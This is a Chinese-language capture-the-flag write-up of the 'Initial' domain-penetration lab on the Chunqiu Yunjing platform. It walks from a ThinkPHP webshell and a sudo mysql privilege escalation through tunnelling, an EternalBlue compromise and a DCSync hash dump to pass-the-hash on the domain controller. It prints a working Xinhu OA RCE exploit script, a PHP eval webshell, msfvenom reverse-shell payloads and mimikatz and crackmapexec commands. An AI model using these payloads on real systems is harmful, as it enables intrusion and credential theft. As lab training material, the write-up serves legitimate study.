记一次春秋云镜域渗透靶场Initial
字数 1334 2025-08-25 22:58:29
春秋云镜域渗透靶场Initial渗透实战教学文档
靶场概述
Initial是一套难度为简单的域渗透靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,但分布在不同的机器上。
技术要点
- DCSync攻击
- CVE漏洞利用
- 域渗透技术
- 内网横向移动
- 内网穿透技术
外网打点
1. 信息收集
使用Kscan对目标IP进行扫描,发现开放了SSH和HTTP服务。
2. Web应用识别
访问Web页面,通过favicon.ico图标识别出系统使用ThinkPHP框架。
3. 漏洞利用
使用ThinkphpGUI工具检测ThinkPHP漏洞,成功利用漏洞上传Webshell。
提权操作
1. SUID提权尝试
尝试SUID提权未果。
2. Sudo提权
发现mysql配置了sudo免密使用,可利用mysql命令获取root权限:
sudo mysql -e '! cat /root/flag/flag01.txt'
通过此方法获取第一个flag。
内网渗透
1. 内网信息收集
上传蚁剑后,查看网卡信息发现内网网段:172.22.1.0/24
关键目标:
- 172.22.1.2:DC域控
- 172.22.1.21:Windows机器,存在MS17-010漏洞
- 172.22.1.18:信呼OA办公系统
2. 内网穿透
使用Neo-reGeorg-master工具建立HTTP内网穿透隧道,配合Proxifier进行全局代理。
3. 信呼OA攻击
3.1 弱口令登录
尝试使用admin/admin123成功登录信呼OA系统。
3.2 RCE漏洞利用
发现信呼OA存在RCE漏洞,使用以下EXP:
import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=::',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath)
print(r.text)
print(url_pre + filepath)
注意:需要准备一个shell.php文件放在脚本相同目录下,内容为一句话木马:
<?=eval($_POST[hacker]);?>
4. 建立持久会话
4.1 生成Linux木马
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=yourVPS LPORT=443 -f elf -o shellrawss
4.2 开启HTTP服务
python3 -m http.server
4.3 获得Meterpreter会话后
- 添加路由
- 开启Socks5服务
- 使用proxychains执行exp.py获取Webshell
5. 横向移动至172.22.1.21
5.1 生成Windows正向木马
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -f exe -o KHG.exe
5.2 使用蚁剑上传并获取Meterpreter会话
5.3 利用永恒之蓝漏洞
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit
DCSync攻击
1. 原理
利用域控制器之间的数据同步复制机制。"模拟"DC向真实DC发送数据同步请求,获取用户凭据数据。利用了Windows RPC协议,不需要登陆域控或在域控上落地文件,隐蔽性高。
2. 攻击前提
需要获得以下任一用户权限:
- Administrators组内用户
- Domain Admins组内用户
- Enterprise Admins组内用户
- 域控制器的计算机帐户
3. 实施步骤
3.1 加载mimikatz
meterpreter> load kiwi
meterpreter> kiwi_cmd privilege::debug
3.2 导出域内哈希
meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
示例输出:
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
1000 DC01$ edc506302bf9b040febfb84a1459c0e8 532
4801104 XIAORANG-OA01$ 673ec2d0ad2f73341c4b3e1fc2fbade5 4096
1103 XIAORANG-WIN7$ 507797b66f76b8b71d20555b0c59f86d 4096
4. 哈希传递攻击
使用crackmapexec进行哈希传递(PTH)攻击域控:
proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
成功获取最终flag03。
总结
本渗透测试流程完整展示了从外网打点到内网横向移动,最终通过DCSync攻击获取域控权限的全过程。关键点包括:
- ThinkPHP漏洞利用
- Sudo提权技术
- 内网穿透技术
- OA系统漏洞利用
- 永恒之蓝漏洞利用
- DCSync攻击原理与实施
- 哈希传递攻击
通过此靶场练习,可以全面了解域渗透的基本流程和技术要点。